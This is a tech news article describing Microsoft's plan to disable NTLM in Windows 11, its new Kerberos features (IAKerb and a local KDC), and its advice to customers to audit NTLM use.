Table of Contents
Microsoft Pushing to Disable NTLM for More Secure Windows Authentication
Microsoft has kick-started an initiative to strengthen Windows authentication by disabling NT LAN Manager (NTLM). A traditional and less secure authentication protocol, NTLM has been under the microscope for its vulnerability against cyber attacks. In addressing these security issues, Microsoft aims to promote a more secure authentication protocol for a safer user experience.
Kerberos Protocol to Be The Focus with New Features for Enhanced Security
In replacement of the NTLM, Microsoft is pushing for the adoption of Kerberos, a stronger and more secure authentication protocol. Kerberos boasts of a mutual authentication feature, where both the user and server verify each other's identity. This ensures higher security levels, preventing potential breaches. With new advanced features under development, Microsoft aims to provide an enhanced level of security barriers through the Kerberos protocol.
NTLM Protocol Considered Weak and Susceptible to Attacks
The decision by Microsoft to phase out the NTLM protocol is majorly driven by its susceptibility to cyber-attacks. Its mechanism is based on storing users' passwords, which can be relatively easier for hackers to intercept, placing user data at high risk. By disabling the NTLM and integrating stronger alternatives such as Kerberos, Microsoft underpins its commitment to improving the security of its operating system.
New Features Introduction
As part of Microsoft's effort to improve Windows Authentication and disable NTLM, the tech giant is introducing new advanced features to Kerberos. These features aim to enhance the protocol's capabilities, offering a more secure and user-friendly authentication process.
Initial and Pass Through Authentication Using Kerberos (IAKerb) for Scenarios without Visibility to a Domain Controller
One of the newly introduced features is the Initial and Pass Through Authentication Using Kerberos (IAKerb). This feature allows for authentication with a Domain Controller through a server with line-of-sight access to the infrastructure. IAKerb works through the Negotiate authentication extension and enables the Windows authentication stack to proxy Kerberos messages through the server on the user's behalf. Due to the cryptographic guarantees of Kerberos, these messages are protected against replay or relay attacks while in transit through the server. IAKerb is particularly useful in environments with firewall segmentation or in remote access scenarios.
Local Key Distribution Center (KDC) for Remote Authentication of Local User Accounts
Another major feature is the introduction of a local Key Distribution Center (KDC) for Kerberos, which adds authentication support for local accounts. This feature uses IAKerb and the Security Account Manager (SAM) to pass messages between remote local machines without the need for DCLocator, NetLogon, and DNS. This eliminates the necessity of visibility to a Domain Controller, making it easier for local user accounts to authenticate remotely.
Upcoming Microsoft Updates
Microsoft continues to make strides towards bolstering the security of Windows authentication. As part of its ongoing efforts to disable the dated NTLM protocol and shift towards a more secure alternative, several key updates are in the pipeline.
Updating Windows Components Built with NTLM to Use Negotiate Protocol
Microsoft plans to gradually modify Windows components that were originally built with NTLM integration, and replace it with the Negotiate protocol. As existing legacy applications and services may not be readily updated, NTLM support will continue as a fallback mechanism for these instances. This initiative aims to promote a seamless transition from NTLM to Negotiate protocol, without compromising on functionality and compatibility.
Management Control Extension for Better Tracking and Blocking NTLM Use
In conjunction with updating the components, Microsoft also intends to enhance NTLM management controls. This enhancement plans to facilitate organizations in monitoring the usage of NTLM within their ecosystem more effectively. Such an initiative will grant IT administrators the ability to disable NTLM for a particular service easily, providing granular control over the legacy protocol usage.
Disabling of NTLM in Windows 11
Looking forward, the ultimate goal of these enhancements is to disable NTLM by default in Windows 11. Microsoft is adopting a data-driven approach to monitor reductions in NTLM usage and determine a safe timeline for disabling it. Meanwhile, Microsoft encourages users to utilise the improved controls to prepare ahead. Once disabled by default, the controls will also permit customers to reenable NTLM for compatibility reasons if necessary.
Microsoft’s Advice to Customers
In line with the focus on enhancing Windows authentication, Microsoft is providing guidance to customers to ensure smooth transitions through the upcoming changes. Suggestions include understanding and preparing for the NTLM disablement and auditing current NTLM utilization.
Encouraging Use of New Controls to Prepare for NTLM Disablement
Microsoft advises users to start using the enhanced controls for a head start in preparing for NTLM's disablement. By maximizing the utilization of these new controls, users can begin to adapt to the more secure alternatives being introduced. With the flexibility to re-enable NTLM for compatibility reasons, users can progressively phase-out NTLM use while maintaining essential services.
Suggesting Cataloging and Auditing of NTLM use for Applications and Services
Microsoft also recommends users to begin cataloging their NTLM usage. Existing policy and logging tools could be utilized to understand where and how extensively NTLM is being used, and which applications might inhibit the disabling of NTLM. Further advice for application developers includes auditing code for hardcoded usage of NTLM and substituting instances with the 'negotiate' command. Such proactive measures can streamline the transition process and mitigate the potential impact of NTLM disablement on the system's operation.
